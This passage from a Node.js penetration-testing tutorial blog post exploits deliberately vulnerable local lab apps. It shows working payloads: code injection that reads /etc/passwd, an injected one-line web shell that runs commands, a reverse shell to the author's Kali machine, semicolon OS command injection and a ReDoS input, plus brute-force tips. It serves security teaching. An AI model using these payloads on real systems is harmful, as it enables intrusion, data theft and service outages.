<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqYJ-KuCyjxKoDY5TjioX1HAookFoC9kyhXk0LiGlyR4sEi6tj3APmuS75GT3_5M4VX_8XjL-V8hXMexUbWJ5wguhBlVH1BmLVw1ruBIcDilKHiuVEZRDjgA9NlQyY-lNPKHwBl-ZqJLA/s1600/Screen+Shot+2017-04-23+at+1.42.45+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqYJ-KuCyjxKoDY5TjioX1HAookFoC9kyhXk0LiGlyR4sEi6tj3APmuS75GT3_5M4VX_8XjL-V8hXMexUbWJ5wguhBlVH1BmLVw1ruBIcDilKHiuVEZRDjgA9NlQyY-lNPKHwBl-ZqJLA/s640/Screen+Shot+2017-04-23+at+1.42.45+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div>
Then kill this <b>codeexe.js </b>pid which is <b>2959</b></div>
<div>
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc9WUXBQQDpSUj3S79WGTPf-NChVf0z2sgqZAPXZK5CWWqqJGvi5t1GGW0OKQ2-0d9QBgL6Y3Dm9jSIjHqePigG6It0yHE14NbauON51gc9EKaT9rRxhKkSrrw2V_4JVNQd_TIYg-o0PY/s1600/Screen+Shot+2017-04-23+at+1.42.45+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc9WUXBQQDpSUj3S79WGTPf-NChVf0z2sgqZAPXZK5CWWqqJGvi5t1GGW0OKQ2-0d9QBgL6Y3Dm9jSIjHqePigG6It0yHE14NbauON51gc9EKaT9rRxhKkSrrw2V_4JVNQd_TIYg-o0PY/s640/Screen+Shot+2017-04-23+at+1.42.45+PM.png" width="640" /></a></div>
<div>
</div>
<div>
So we started our js code. </div>
<div>
<b><br /></b></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMJzljAsR59ztAoi3UCe1eliwa2R-dhns-AxrUGJ2ohrlx7qXkhat0DlGF4Xse0gD3buzTMlMDcNrmFYu16qJ01FDKnTh1zfUN9nP299NOxnXbiCExec6MW57QHRLp0PmyK7KeTGf5CY0/s1600/Screen+Shot+2017-04-23+at+1.36.21+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="26" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMJzljAsR59ztAoi3UCe1eliwa2R-dhns-AxrUGJ2ohrlx7qXkhat0DlGF4Xse0gD3buzTMlMDcNrmFYu16qJ01FDKnTh1zfUN9nP299NOxnXbiCExec6MW57QHRLp0PmyK7KeTGf5CY0/s640/Screen+Shot+2017-04-23+at+1.36.21+PM.png" width="640" /></a><br />
<br />
First, we are passing a simple user input to the <b>input </b>parameter as defined in our code.<br />
<br />
<b>http://127.0.0.1:8001/?input=4444441111</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAAbQo1uxVm8xaSu1dXyqfdB0p2wdEeMy3CfWnZOzIcMHw8-gAAbXFHlIsnZ0RMjNu6ERaYO_wdSv2qw8tW7nNhOEPvTgtkjzWFABu8HAgA8Wb9v1HPrNffcs_yT99I1Nqdp6KbCt2-90/s1600/Screen+Shot+2017-04-23+at+1.35.24+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="154" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAAbQo1uxVm8xaSu1dXyqfdB0p2wdEeMy3CfWnZOzIcMHw8-gAAbXFHlIsnZ0RMjNu6ERaYO_wdSv2qw8tW7nNhOEPvTgtkjzWFABu8HAgA8Wb9v1HPrNffcs_yT99I1Nqdp6KbCt2-90/s640/Screen+Shot+2017-04-23+at+1.35.24+PM.png" width="640" /></a></div>
<br />
<br />
We use some of the payloads for the Node.js Code Execution Vulnerability.<br />
Payloads URL - <a href="https://drive.google.com/file/d/0B-LjC3oY6tUpRXZJRXMxbnlvV3M/view">https://drive.google.com/file/d/0B-LjC3oY6tUpRXZJRXMxbnlvV3M/view</a><br />
<br />
Setting up the intruder.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhslu1nRSuWm9OWVBjJhhlpeSup1gwevsWYljx2JXxFsoVOEE5dFH30X_ge3ilE_RQNwIYT8tZWbYOIm3Soi8-58mM0DxlKq_IahACCnBeUXp7b_YNxZB2NZy1dEkgoiHRdu2AJwWmnxM4/s1600/Screen+Shot+2017-04-23+at+1.54.58+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhslu1nRSuWm9OWVBjJhhlpeSup1gwevsWYljx2JXxFsoVOEE5dFH30X_ge3ilE_RQNwIYT8tZWbYOIm3Soi8-58mM0DxlKq_IahACCnBeUXp7b_YNxZB2NZy1dEkgoiHRdu2AJwWmnxM4/s640/Screen+Shot+2017-04-23+at+1.54.58+PM.png" width="640" /></a></div>
<br />
Following was the payloads.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL4ZrOWZkmlo33oS21lwdYvDDd_E-00b3B9GNrJ3uIeFFJ3Af7etFUCORghmIEgBG1NIE3rLeFpzMQBlWY1Il9vEH8yNcxN6I6Wxfo5-tvq7q2DEveo-9eKwr7QsR8u_gWQutfs9JsIXw/s1600/Screen+Shot+2017-04-23+at+2.39.58+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL4ZrOWZkmlo33oS21lwdYvDDd_E-00b3B9GNrJ3uIeFFJ3Af7etFUCORghmIEgBG1NIE3rLeFpzMQBlWY1Il9vEH8yNcxN6I6Wxfo5-tvq7q2DEveo-9eKwr7QsR8u_gWQutfs9JsIXw/s640/Screen+Shot+2017-04-23+at+2.39.58+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Intruder attack result.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We can see the <b>process.cwd() </b>response contents <b>current user directory as "/Users/narendrabhati/Node JS Pentesting"</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDlu1DNHiSF7C2yJcjpdNUuFalEiieqOopaoDNaCjG8VYtBMr7KQx8cmZTYNhk86K4kBmsbKllIttI7XEq0gPBtdw1oXm2tyG7Ft3Mq_feMl7CNT9V2WcFa0UzpnB_d5oOUGKoZ1rVLAY/s1600/Screen+Shot+2017-04-23+at+2.41.05+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="448" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDlu1DNHiSF7C2yJcjpdNUuFalEiieqOopaoDNaCjG8VYtBMr7KQx8cmZTYNhk86K4kBmsbKllIttI7XEq0gPBtdw1oXm2tyG7Ft3Mq_feMl7CNT9V2WcFa0UzpnB_d5oOUGKoZ1rVLAY/s640/Screen+Shot+2017-04-23+at+2.41.05+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
After confirming we do many operations as we want. Ex. we can read internal files </div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>http://127.0.0.1:8001/?input=res.end(require('fs').readFileSync('/etc/passwd').toString())</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0dQ2z_xgsdxckYAMOaMpySpRmlKRuLeHxfVHSnh1jxIfucPnikFfgRHdIt3uvQ01AsuM7RyRjZHDuLFij_muxX04vH3G7F700ZpCqB2jpDQQ7-xlfmVpE2aoJs06dKQOArDWiAMOfbPI/s1600/Screen+Shot+2017-04-23+at+3.12.51+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="572" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0dQ2z_xgsdxckYAMOaMpySpRmlKRuLeHxfVHSnh1jxIfucPnikFfgRHdIt3uvQ01AsuM7RyRjZHDuLFij_muxX04vH3G7F700ZpCqB2jpDQQ7-xlfmVpE2aoJs06dKQOArDWiAMOfbPI/s640/Screen+Shot+2017-04-23+at+3.12.51+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Now we are moving to a simple web shell just like simple php shell from where you can perform/injection system commands.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Below will payload will start a new web server or you can say a new nodejs app on port 8002 after 8 seconds. Lets try this.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>setTimeout(function() { require('http').createServer(function (req, res) { res.writeHead(200, {"Content-Type": "text/plain"});require('child_process').exec(require('url').parse(req.url, true).query['cmd'], function(e,s,st) {res.end(s);}); }).listen(8002); }, 8000)</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyWfAsMI71XATD3S-Fdq2ylL_1g_8_tEFveqCVHGwC5i_PdeXDKpdeAmz3mmy9eHnIug3dcKCyWrKY_SN5HblbS9wdSs43AGsU70vy3N27bO-MfJkA8sT9UcHpv5kW-waJYUoUOGdEhUw/s1600/Screen+Shot+2017-04-23+at+3.30.11+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyWfAsMI71XATD3S-Fdq2ylL_1g_8_tEFveqCVHGwC5i_PdeXDKpdeAmz3mmy9eHnIug3dcKCyWrKY_SN5HblbS9wdSs43AGsU70vy3N27bO-MfJkA8sT9UcHpv5kW-waJYUoUOGdEhUw/s640/Screen+Shot+2017-04-23+at+3.30.11+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Now after 8 seconds, you can look for the target on port 8002 by passing parameter <b>cmd </b>with some commands.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>http://127.0.0.1:8002/?cmd=ls ; uname -a ; whoami</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZAN8EGIQZdFj5x2rarEcsaYKCtjoJoEyNc9Xc2cgDHeVwT1aDMafRSQSFpXcIBLfb9KjOLlzGpmIoVjuPQitrY5KqJsQMLRSbFUXmuPkDJZ4lvUL1BVSp1cZNhRMp5kwXCHBrafYV8wk/s1600/Screen+Shot+2017-04-23+at+3.32.00+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZAN8EGIQZdFj5x2rarEcsaYKCtjoJoEyNc9Xc2cgDHeVwT1aDMafRSQSFpXcIBLfb9KjOLlzGpmIoVjuPQitrY5KqJsQMLRSbFUXmuPkDJZ4lvUL1BVSp1cZNhRMp5kwXCHBrafYV8wk/s640/Screen+Shot+2017-04-23+at+3.32.00+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Reverse Connection</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<b>B) Reverse Shell ( Exploiting Server Side JavaScript Injection )</b><br />
<b><br /></b>
For getting a reverse shell, we can use nodejsshell.py python script which you can found <a href="https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py" target="_blank">here</a><br />
This script will create a js code according to the <b>attacker ip and attacker local port.</b><br />
It comes very handy when you have direct connection with the nodejs application or you both are in the same network.<br />
<br />
Below i tested Successful Ping with my Kali Machine ]192.168.131.134] and later on run the nodejsshell.py file with my kali machine ip <b>192.168.131.134</b> as attacker and attacker port 4444.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYDSu7ge4o3OnQfzIiVcjV_77roHSx80rhEGbVaidzdFZB749u7bECe6uGBJfcYfwskiK-i22veC6htBaaMVTOmMDoIXfx14GS7ipLxSFl1Bo6TodOq_C-5zaUGO6IBXFtW-GCPz7g0RE/s1600/Screen+Shot+2017-04-23+at+3.43.39+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYDSu7ge4o3OnQfzIiVcjV_77roHSx80rhEGbVaidzdFZB749u7bECe6uGBJfcYfwskiK-i22veC6htBaaMVTOmMDoIXfx14GS7ipLxSFl1Bo6TodOq_C-5zaUGO6IBXFtW-GCPz7g0RE/s640/Screen+Shot+2017-04-23+at+3.43.39+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
In my Kali Machine, I am waiting for a connection on port 4444<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1h4ebHVmyhL7u5g_hhDu1SnaoM3iC3lZTfac3hyphenhyphen86TMGGZe1JB9_qRMePNajdTrTvCfjEHOazmXiVYLLft7LSbp68VgAveT3eF5gVW2pqfkRWQ5yzFPKjB73i_FTqOX7HvRZgBTtlQQM/s1600/Screen+Shot+2017-04-23+at+3.50.58+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1h4ebHVmyhL7u5g_hhDu1SnaoM3iC3lZTfac3hyphenhyphen86TMGGZe1JB9_qRMePNajdTrTvCfjEHOazmXiVYLLft7LSbp68VgAveT3eF5gVW2pqfkRWQ5yzFPKjB73i_FTqOX7HvRZgBTtlQQM/s640/Screen+Shot+2017-04-23+at+3.50.58+PM.png" width="640" /></a></div>
<br />
<br />
I injected those code get from nodejsshell.py into the application.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjv61eBudgKE4KzyNCzUx0FE0f8wmwWZnun-oDJNBFDLY_MFyCgkDFcKQ6XDsaTj0DXz_LfIsmEGMB6N5kFcsXnmI7rpIWr6DAf0hfFwNFA5lKYrw4FVAXcAyqnE1fRiNYhIprNVJL4cv0/s1600/Screen+Shot+2017-04-23+at+3.45.41+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjv61eBudgKE4KzyNCzUx0FE0f8wmwWZnun-oDJNBFDLY_MFyCgkDFcKQ6XDsaTj0DXz_LfIsmEGMB6N5kFcsXnmI7rpIWr6DAf0hfFwNFA5lKYrw4FVAXcAyqnE1fRiNYhIprNVJL4cv0/s640/Screen+Shot+2017-04-23+at+3.45.41+PM.png" width="640" /></a></div>
<br />
And i got the reverse shell in my Kali Machine.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLkF1YI61xOpV-lUE2fsK4eQ2_uT9cSB6s_mPryozuWQqRpHSPkQkMw3MtYonTfRabyIx8Q45ifjcCwu5C13x5ocw89RONtOChy0jnguMlkZnIbxwUiTto6gSPDlqpB0hq-O4sUQKomeE/s1600/Screen+Shot+2017-04-23+at+3.49.34+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="134" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLkF1YI61xOpV-lUE2fsK4eQ2_uT9cSB6s_mPryozuWQqRpHSPkQkMw3MtYonTfRabyIx8Q45ifjcCwu5C13x5ocw89RONtOChy0jnguMlkZnIbxwUiTto6gSPDlqpB0hq-O4sUQKomeE/s640/Screen+Shot+2017-04-23+at+3.49.34+PM.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>2) Remote OS Command Execution</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
Similar to <b>Remote Code Execution ( Exploiting Server Side JavaScript Injection )</b> This vulnerability also allow attacker to perform to Arbitrary Command Execution. The key difference is that This vulnerability occurs because of unsafe uses of <b>exe.exec </b>which is self responsible for allow application to interact wit System/OS commands.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
[nodejsrce.js]</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<b>var http = require("http");</b></div>
<div class="separator" style="clear: both;">
<b>var url = require("url");</b></div>
<div class="separator" style="clear: both;">
<b>var exe = require('child_process');</b></div>
<div class="separator" style="clear: both;">
<b>http.createServer(function(request, response)</b></div>
<div class="separator" style="clear: both;">
<b><span class="Apple-tab-span" style="white-space: pre;"> </span>{</b></div>
<div class="separator" style="clear: both;">
<b><span class="Apple-tab-span" style="white-space: pre;"> </span>var parsedUrl = url.parse(request.url, true);</b></div>
<div class="separator" style="clear: both;">
<b><span class="Apple-tab-span" style="white-space: pre;"> </span>response.writeHead(200, {"Content-Type": "text/html"});</b></div>
<div class="separator" style="clear: both;">
<b>exe.exec('ping -c 4 ' + parsedUrl.query.inject, function (err,data)</b></div>
<div class="separator" style="clear: both;">
<b><span class="Apple-tab-span" style="white-space: pre;"> </span>{</b></div>
<div class="separator" style="clear: both;">
<b><span class="Apple-tab-span" style="white-space: pre;"> </span>response.write("RCE-DEMO " + data);</b></div>
<div class="separator" style="clear: both;">
<b><span class="Apple-tab-span" style="white-space: pre;"> </span>});</b></div>
<div class="separator" style="clear: both;">
<b><span class="Apple-tab-span" style="white-space: pre;"> </span>}).listen(8005);</b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWImcrzHB4wnLU8VXbQq8ejz5gWOJvaw0Oi8HPeiCkgAw-he-nHJR6O98wpCAfg4zqdOnXG9i8AJVAAsWgfosJhEFk6Va7wlFrr8ZT2W6DVOPnkMsDNX16fTY3Jc9v_GAc8IZpIic_XVE/s1600/Screen+Shot+2017-04-23+at+4.13.23+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWImcrzHB4wnLU8VXbQq8ejz5gWOJvaw0Oi8HPeiCkgAw-he-nHJR6O98wpCAfg4zqdOnXG9i8AJVAAsWgfosJhEFk6Va7wlFrr8ZT2W6DVOPnkMsDNX16fTY3Jc9v_GAc8IZpIic_XVE/s640/Screen+Shot+2017-04-23+at+4.13.23+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
By looking at the source code we can say that <b>exe.exec </b>is taking an user input via <b>inject </b>parameter without filtering or escaping the user input.As a result user/attacker can inject any value which allow him to perform <b>NodeJS</b> <b>Remote OS Command Execution.</b></div>
<div>
<b><br /></b></div>
<div>
Below is our application ping command example.</div>
<div>
<b><br /></b></div>
<div>
<b>http://127.0.0.1:8005/?inject=google.com</b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixm3gcG3ErnGHA5zfo-eGHLWu_ynzAbTALAegw9qs4R_cuQ642XSVD3G7tOMa5eJu-Kwez4pPa3sgp9iLpwvkmeu-PRqGWrKwAmuUKtb5IqCx1SGvwIzxZMRUgUM-LBOJuasT6g85QsjA/s1600/Screen+Shot+2017-04-23+at+4.18.01+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="82" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixm3gcG3ErnGHA5zfo-eGHLWu_ynzAbTALAegw9qs4R_cuQ642XSVD3G7tOMa5eJu-Kwez4pPa3sgp9iLpwvkmeu-PRqGWrKwAmuUKtb5IqCx1SGvwIzxZMRUgUM-LBOJuasT6g85QsjA/s640/Screen+Shot+2017-04-23+at+4.18.01+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<br /></div>
<div>
I am not going into the basic of Command Execution, If you want know more about OS Command Execution please go through <a href="https://www.slideshare.net/bhati123/owasp-pune-chapter-dive-into-the-profound-web-attacks-58494512?qid=daa6aef7-822a-4a07-841e-d62de04ddaa9&v=&b=&from_search=2" target="_blank">this slide.</a> </div>
<div>
<br /></div>
<div>
<b><br /></b></div>
<div>
A typical Simple OS Command Execution is entering semi columns after value and inject commands</div>
<div>
<br /></div>
<div>
<b>http://127.0.0.1:8005/?inject=google.com ; ls</b></div>
<div>
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikRIux4KJ-wVn8cFo-o8hsudQZ9iXWPqqd9-STndsLwie5V3AKAOUMDt9nhdCFWK90osvowO5zj9FEZ_4i40C15FsGsffkJDti74YwgULVjREi05QHUoFwOw26xvwWEusoQwkhlB6nSSY/s1600/Screen+Shot+2017-04-23+at+4.18.56+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikRIux4KJ-wVn8cFo-o8hsudQZ9iXWPqqd9-STndsLwie5V3AKAOUMDt9nhdCFWK90osvowO5zj9FEZ_4i40C15FsGsffkJDti74YwgULVjREi05QHUoFwOw26xvwWEusoQwkhlB6nSSY/s640/Screen+Shot+2017-04-23+at+4.18.56+PM.png" width="640" /></a></div>
<div>
We can pass multiple commands in single time.</div>
<div>
<br /></div>
<div>
<b>http://127.0.0.1:8005/?inject=google.com ; whoami ; pwd ; ls -al</b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinHFEhhFfORlm8oe4ccRAv2pVu7NNL1Smbf9CzPrl-HzW-UjGnKjXHKkcteHzekCNrmnPMDJWEGqG63Ka0PQbAm_Kw5pUyGzPshsTC_-0OAdAiXfbnguxR5nrgBw8A3w_mLM6oouG0QQo/s1600/Screen+Shot+2017-04-23+at+4.24.20+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinHFEhhFfORlm8oe4ccRAv2pVu7NNL1Smbf9CzPrl-HzW-UjGnKjXHKkcteHzekCNrmnPMDJWEGqG63Ka0PQbAm_Kw5pUyGzPshsTC_-0OAdAiXfbnguxR5nrgBw8A3w_mLM6oouG0QQo/s640/Screen+Shot+2017-04-23+at+4.24.20+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<b><br /></b></div>
<div>
<div class="separator" style="clear: both;">
<b>3) RegExp DOS Vulnerability</b></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
According To <b><a href="https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS" target="_blank">OWASP</a></b></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
The Regular expression Denial of Service (ReDoS) is a Denial of Service attack, that exploits the fact that most Regular Expression implementations may reach extreme situations that cause them to work very slowly (exponentially related to input size). An attacker can then cause a program using a Regular Expression to enter these extreme situations and then hang for a very long time.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
In the short note an attacker can abuse the Regular Expression validation by sending large amount of false data, which trick the application to consume larger number of server resource resulting un-availability of the service/application for other user.</div>
</div>
<div>
<b><br /></b></div>
<div>
<b>[ nodejsregexp.js]</b></div>
<div>
<b><br /></b></div>
<div>
<div style="font-weight: bold;">
var http = require("http");</div>
<div style="font-weight: bold;">
var url = require("url");</div>
<div style="font-weight: bold;">
http.createServer(function(request, response)</div>
<div style="font-weight: bold;">
{</div>
<div style="font-weight: bold;">
starttime = process.hrtime();</div>
<div style="font-weight: bold;">
var emailExpression = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;</div>
<div style="font-weight: bold;">
var parsedUrl = url.parse(request.url, true);</div>
<div style="font-weight: bold;">
response.writeHead(200, {"Content-Type": "text/html"});</div>
<div style="font-weight: bold;">
response.write("Email Validation : "+emailExpression.test( parsedUrl.query.email ));</div>
<div style="font-weight: bold;">
response.write("</br>Server Response Time: " + process.hrtime(starttime));</div>
<div style="font-weight: bold;">
response.end();</div>
<div style="font-weight: bold;">
}).listen(8006);</div>
<div style="font-weight: bold;">
<br /></div>
<div>
Following <span style="font-weight: bold;">var emailExpression = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/; reg exp.</span> is found vulnerable to DOS attack, where attacker can pass a large number of input to the application. which cause service/application un-availability.</div>
<div>
<br /></div>
<div>
For Dosing</div>
<div>
<br /></div>
<div>
<b>http://127.0.0.1:8006/?email=narealshdlhasldhlashkldhalshdlkahslkdhklashldhalkshdklahskldhklashkldhaklshdklhalshdlahslhdhasklkhdlkahdndra.bhagdkjgkasgkdgakjsgdjkgaskgdjkagskdgjkasgjkdgjasgdgjkasgjdgjaksgjkdgjaksgkdgjaksjkgdgjaksjgkdgajksgdjkagjskdgjkajsgkdgjkasjgkdadati@websasdasdaksdgakjsgdkgajksgdjkagsjkdgajkgdjkagksdgjkasgjkdgjasjkdjkagjkdgagkasjdadecgeeks.caskdhahldkhalkshdklahsldhklashdlhaklshdlahsldhlkahsdhlashdhaklshdhaklshdklahslhdkahsdhkahsldhaskhldhalshdhlashdasdom%%%%////</b></div>
<div>
<b><br /></b></div>
<div>
This large input will cause the application to consumer lots of server resources.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5y3aqVj1uCANJe163JZDypTWTkcLMbDfnm_vVfQnzmLIxCxUe2te-3UXTPxSUgF8EB3YSlWQleRgPXyb_ZnPJXsEqOowww-OhpUl9llRzAfX0l9peSQSraUhU-yoHaaiY2qxYEbNIuiw/s1600/Screen+Shot+2017-04-23+at+5.22.44+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5y3aqVj1uCANJe163JZDypTWTkcLMbDfnm_vVfQnzmLIxCxUe2te-3UXTPxSUgF8EB3YSlWQleRgPXyb_ZnPJXsEqOowww-OhpUl9llRzAfX0l9peSQSraUhU-yoHaaiY2qxYEbNIuiw/s640/Screen+Shot+2017-04-23+at+5.22.44+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<b><br /></b></div>
<div>
<span style="font-weight: bold;"><br /></span></div>
<div style="text-align: center;">
For better understanding i have created a video.</div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/ovEY6M06eqY/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/ovEY6M06eqY?feature=player_embedded" width="320"></iframe></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<br /></div>
<div style="font-weight: bold;">
<b>4 ) Brute Force/Rate Limit Protection</b></div>
<div style="font-weight: bold;">
<br /></div>
<div>
I have already discussed about the rate limit on one of <a href="http://www.websecgeeks.com/2015/06/bypass-brute-force-protection-login.html" target="_blank">post here</a>.</div>
<div>
<br /></div>
<div>
While doing Pentesting of NodeJS application always look for the end points where you can perform a brute force/wordlist attack. Ex. </div>
<div>
<br /></div>
<div>
<b>A) Forgot Your Password Form : </b>Try to enumerate existing users</div>
<div>
<b>B) OTP - OTP </b>Mostly used for Password Reset,Mobile Verification,Account Creation</div>
<div>
<b>C) Password Reset Code : </b>Some times password reset tokens might be brute-forcable.</div>
<div>
<br /></div>
<div>
<b>5) NPM </b></div>
<div>
<br /></div>
<div>
It is possible that existing npm packages may have some existed vulnerabilities. Here The Node Security Project Comes In The Rescue.</div>
<div>
Using NSP tools, we can look for the existing vulnerabilities.</div>
<div>
<br /></div>
<div>
Following command will install nps.</div>
<div>
<br /></div>
<div>
<b>npm i nsp -g [</b>This will install nsp]</div>
<div>
